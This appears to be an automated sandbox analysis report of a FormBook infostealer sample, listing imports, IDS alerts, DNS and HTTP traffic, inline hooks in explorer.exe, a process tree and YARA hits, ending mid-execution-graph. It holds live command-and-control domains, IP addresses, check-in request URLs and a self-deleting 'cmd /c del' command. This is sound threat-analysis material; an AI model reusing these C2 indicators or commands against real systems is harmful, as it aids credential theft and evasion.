                                                                                                          USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                          GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                          OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishGreat Britain
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-09T11:09:13.337078+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449827185.53.179.9180TCP
                                                                                                          2025-01-09T11:09:13.337078+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449827185.53.179.9180TCP
                                                                                                          2025-01-09T11:09:13.337078+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.449827185.53.179.9180TCP
                                                                                                          2025-01-09T11:09:54.469634+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.4500033.33.130.19080TCP
                                                                                                          2025-01-09T11:09:54.469634+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.4500033.33.130.19080TCP
                                                                                                          2025-01-09T11:09:54.469634+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.4500033.33.130.19080TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 9, 2025 11:09:12.821021080 CET4982780192.168.2.4185.53.179.91
                                                                                                          Jan 9, 2025 11:09:12.825882912 CET8049827185.53.179.91192.168.2.4
                                                                                                          Jan 9, 2025 11:09:12.831399918 CET4982780192.168.2.4185.53.179.91
                                                                                                          Jan 9, 2025 11:09:12.831399918 CET4982780192.168.2.4185.53.179.91
                                                                                                          Jan 9, 2025 11:09:12.836253881 CET8049827185.53.179.91192.168.2.4
                                                                                                          Jan 9, 2025 11:09:13.329039097 CET4982780192.168.2.4185.53.179.91
                                                                                                          Jan 9, 2025 11:09:13.334105968 CET8049827185.53.179.91192.168.2.4
                                                                                                          Jan 9, 2025 11:09:13.337078094 CET4982780192.168.2.4185.53.179.91
                                                                                                          Jan 9, 2025 11:09:54.001627922 CET5000380192.168.2.43.33.130.190
                                                                                                          Jan 9, 2025 11:09:54.006418943 CET80500033.33.130.190192.168.2.4
                                                                                                          Jan 9, 2025 11:09:54.006475925 CET5000380192.168.2.43.33.130.190
                                                                                                          Jan 9, 2025 11:09:54.006581068 CET5000380192.168.2.43.33.130.190
                                                                                                          Jan 9, 2025 11:09:54.012450933 CET80500033.33.130.190192.168.2.4
                                                                                                          Jan 9, 2025 11:09:54.469468117 CET80500033.33.130.190192.168.2.4
                                                                                                          Jan 9, 2025 11:09:54.469583988 CET80500033.33.130.190192.168.2.4
                                                                                                          Jan 9, 2025 11:09:54.469583988 CET5000380192.168.2.43.33.130.190
                                                                                                          Jan 9, 2025 11:09:54.469634056 CET5000380192.168.2.43.33.130.190
                                                                                                          Jan 9, 2025 11:09:54.474421024 CET80500033.33.130.190192.168.2.4
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 9, 2025 11:08:31.953774929 CET5169853192.168.2.41.1.1.1
                                                                                                          Jan 9, 2025 11:08:32.968591928 CET5169853192.168.2.41.1.1.1
                                                                                                          Jan 9, 2025 11:08:33.983874083 CET5169853192.168.2.41.1.1.1
                                                                                                          Jan 9, 2025 11:08:35.983875990 CET5169853192.168.2.41.1.1.1
                                                                                                          Jan 9, 2025 11:08:37.966870070 CET53516981.1.1.1192.168.2.4
                                                                                                          Jan 9, 2025 11:08:37.966886044 CET53516981.1.1.1192.168.2.4
                                                                                                          Jan 9, 2025 11:08:37.966895103 CET53516981.1.1.1192.168.2.4
                                                                                                          Jan 9, 2025 11:08:37.966934919 CET53516981.1.1.1192.168.2.4
                                                                                                          Jan 9, 2025 11:08:52.063436985 CET5773353192.168.2.41.1.1.1
                                                                                                          Jan 9, 2025 11:08:52.072493076 CET53577331.1.1.1192.168.2.4
                                                                                                          Jan 9, 2025 11:09:12.765923977 CET5476353192.168.2.41.1.1.1
                                                                                                          Jan 9, 2025 11:09:12.816818953 CET53547631.1.1.1192.168.2.4
                                                                                                          Jan 9, 2025 11:09:33.273475885 CET5045653192.168.2.41.1.1.1
                                                                                                          Jan 9, 2025 11:09:33.710690022 CET53504561.1.1.1192.168.2.4
                                                                                                          Jan 9, 2025 11:09:53.938158989 CET6457953192.168.2.41.1.1.1
                                                                                                          Jan 9, 2025 11:09:54.000694990 CET53645791.1.1.1192.168.2.4
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 9, 2025 11:08:31.953774929 CET192.168.2.41.1.1.10xee3cStandard query (0)www.6vay.boatsA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:08:32.968591928 CET192.168.2.41.1.1.10xee3cStandard query (0)www.6vay.boatsA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:08:33.983874083 CET192.168.2.41.1.1.10xee3cStandard query (0)www.6vay.boatsA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:08:35.983875990 CET192.168.2.41.1.1.10xee3cStandard query (0)www.6vay.boatsA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:08:52.063436985 CET192.168.2.41.1.1.10xd628Standard query (0)www.ffgzgbl.xyzA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:09:12.765923977 CET192.168.2.41.1.1.10x6316Standard query (0)www.suv-deals-49508.bondA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:09:33.273475885 CET192.168.2.41.1.1.10x17cbStandard query (0)www.imxtld.clubA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:09:53.938158989 CET192.168.2.41.1.1.10x47b2Standard query (0)www.energyecosystem.appA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 9, 2025 11:08:37.966870070 CET1.1.1.1192.168.2.40xee3cServer failure (2)www.6vay.boatsnonenoneA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:08:37.966886044 CET1.1.1.1192.168.2.40xee3cServer failure (2)www.6vay.boatsnonenoneA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:08:37.966895103 CET1.1.1.1192.168.2.40xee3cServer failure (2)www.6vay.boatsnonenoneA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:08:37.966934919 CET1.1.1.1192.168.2.40xee3cServer failure (2)www.6vay.boatsnonenoneA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:08:52.072493076 CET1.1.1.1192.168.2.40xd628Name error (3)www.ffgzgbl.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:09:12.816818953 CET1.1.1.1192.168.2.40x6316No error (0)www.suv-deals-49508.bond185.53.179.91A (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:09:54.000694990 CET1.1.1.1192.168.2.40x47b2No error (0)www.energyecosystem.appenergyecosystem.appCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:09:54.000694990 CET1.1.1.1192.168.2.40x47b2No error (0)energyecosystem.app3.33.130.190A (IP address)IN (0x0001)false
                                                                                                          Jan 9, 2025 11:09:54.000694990 CET1.1.1.1192.168.2.40x47b2No error (0)energyecosystem.app15.197.148.33A (IP address)IN (0x0001)false
                                                                                                          • www.suv-deals-49508.bond
                                                                                                          • www.energyecosystem.app
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449827185.53.179.91802580C:\Windows\explorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 9, 2025 11:09:12.831399918 CET168OUTGET /hwu6/?p0D=AfhLzLu&Dzr4T=CMKgcc8wmxxR7fJItHbMJ/VlsopyIdLojC2P8mirEdBvwXB60poQ/q0A3kD4/g2OcT4A HTTP/1.1
                                                                                                          Host: www.suv-deals-49508.bond
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.4500033.33.130.190802580C:\Windows\explorer.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 9, 2025 11:09:54.006581068 CET167OUTGET /hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE HTTP/1.1
                                                                                                          Host: www.energyecosystem.app
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jan 9, 2025 11:09:54.469468117 CET322INHTTP/1.1 200 OK
                                                                                                          content-type: text/html
                                                                                                          date: Thu, 09 Jan 2025 10:09:54 GMT
                                                                                                          content-length: 201
                                                                                                          connection: close
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 30 44 3d 41 66 68 4c 7a 4c 75 26 44 7a 72 34 54 3d 57 74 4a 6f 69 73 4d 57 79 62 6a 6d 37 56 6e 67 45 36 34 56 6a 2f 44 65 52 46 4c 45 4c 48 73 31 31 61 4a 64 41 58 6f 6b 43 35 33 69 7a 4d 65 46 4c 46 78 57 55 6a 47 44 64 36 50 36 33 75 70 36 41 61 70 45 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE"}</script></head></html>


                                                                                                          Code Manipulations

                                                                                                          Function NameHook TypeActive in Processes
                                                                                                          PeekMessageAINLINEexplorer.exe
                                                                                                          PeekMessageWINLINEexplorer.exe
                                                                                                          GetMessageWINLINEexplorer.exe
                                                                                                          GetMessageAINLINEexplorer.exe
                                                                                                          Function NameHook TypeNew Data
                                                                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE2
                                                                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE2
                                                                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE2
                                                                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE2

                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:05:07:56
                                                                                                          Start date:09/01/2025
                                                                                                          Path:C:\Users\user\Desktop\janacourse2.1.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\janacourse2.1.exe"
                                                                                                          Imagebase:0xfb0000
                                                                                                          File size:1'796'096 bytes
                                                                                                          MD5 hash:9746B0E34B3A2048074CAF932A112CC1
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:05:07:57
                                                                                                          Start date:09/01/2025
                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\janacourse2.1.exe"
                                                                                                          Imagebase:0x540000
                                                                                                          File size:46'504 bytes
                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:05:07:57
                                                                                                          Start date:09/01/2025
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:3
                                                                                                          Start time:05:07:59
                                                                                                          Start date:09/01/2025
                                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\SysWOW64\explorer.exe"
                                                                                                          Imagebase:0x480000
                                                                                                          File size:4'514'184 bytes
                                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:4
                                                                                                          Start time:05:08:03
                                                                                                          Start date:09/01/2025
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                                          Imagebase:0x240000
                                                                                                          File size:236'544 bytes
                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:05:08:03
                                                                                                          Start date:09/01/2025
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:2.6%
                                                                                                            Dynamic/Decrypted Code Coverage:1.2%
                                                                                                            Signature Coverage:3.6%
                                                                                                            Total number of Nodes:1524
                                                                                                            Total number of Limit Nodes:47
                                                                                                            execution_graph 95389 fb105b 95394 fb344d 95389->95394 95391 fb106a 95425 fd00a3 29 API calls __onexit 95391->95425 95393 fb1074 95395 fb345d __wsopen_s 95394->95395 95426 fba961 95395->95426 95399 fb351c 95438 fb3357 95399->95438 95406 fba961 22 API calls 95407 fb354d 95406->95407 95459 fba6c3 95407->95459 95410 ff3176 RegQueryValueExW 95411 ff320c RegCloseKey 95410->95411 95412 ff3193 95410->95412 95414 fb3578 95411->95414 95420 ff321e _wcslen 95411->95420 95465 fcfe0b 95412->95465 95414->95391 95415 ff31ac 95475 fb5722 95415->95475 95418 ff31d4 95478 fb6b57 95418->95478 95420->95414 95421 fb4c6d 22 API calls 95420->95421 95424 fb515f 22 API calls 95420->95424 95490 fb9cb3 95420->95490 95421->95420 95422 ff31ee ISource 95422->95411 95424->95420 95425->95393 95427 fcfe0b 22 API calls 95426->95427 95428 fba976 95427->95428 95496 fcfddb 95428->95496 95430 fb3513 95431 fb3a5a 95430->95431 95518 ff1f50 95431->95518 95434 fb9cb3 22 API calls 95435 fb3a8d 95434->95435 95520 fb3aa2 95435->95520 95437 fb3a97 95437->95399 95439 ff1f50 __wsopen_s 95438->95439 95440 fb3364 GetFullPathNameW 95439->95440 95441 fb3386 95440->95441 95442 fb6b57 22 API calls 95441->95442 95443 fb33a4 95442->95443 95444 fb33c6 95443->95444 95445 ff30bb 95444->95445 95446 fb33dd 95444->95446 95448 fcfddb 22 API calls 95445->95448 95544 fb33ee 95446->95544 95450 ff30c5 _wcslen 95448->95450 95449 fb33e8 95453 fb515f 95449->95453 95451 fcfe0b 22 API calls 95450->95451 95452 ff30fe __fread_nolock 95451->95452 95454 fb516e 95453->95454 95458 fb518f __fread_nolock 95453->95458 95457 fcfe0b 22 API calls 95454->95457 95455 fcfddb 22 API calls 95456 fb3544 95455->95456 95456->95406 95457->95458 95458->95455 95460 fba6dd 95459->95460 95461 fb3556 RegOpenKeyExW 95459->95461 95462 fcfddb 22 API calls 95460->95462 95461->95410 95461->95414 95463 fba6e7 95462->95463 95464 fcfe0b 22 API calls 95463->95464 95464->95461 95469 fcfddb 95465->95469 95466 fdea0c ___std_exception_copy 21 API calls 95466->95469 95467 fcfdfa 95467->95415 95469->95466 95469->95467 95471 fcfdfc 95469->95471 95559 fd4ead 7 API calls 2 library calls 95469->95559 95470 fd066d 95561 fd32a4 RaiseException 95470->95561 95471->95470 95560 fd32a4 RaiseException 95471->95560 95474 fd068a 95474->95415 95476 fcfddb 22 API calls 95475->95476 95477 fb5734 RegQueryValueExW 95476->95477 95477->95418 95477->95422 95479 fb6b67 _wcslen 95478->95479 95480 ff4ba1 95478->95480 95483 fb6b7d 95479->95483 95484 fb6ba2 95479->95484 95481 fb93b2 22 API calls 95480->95481 95482 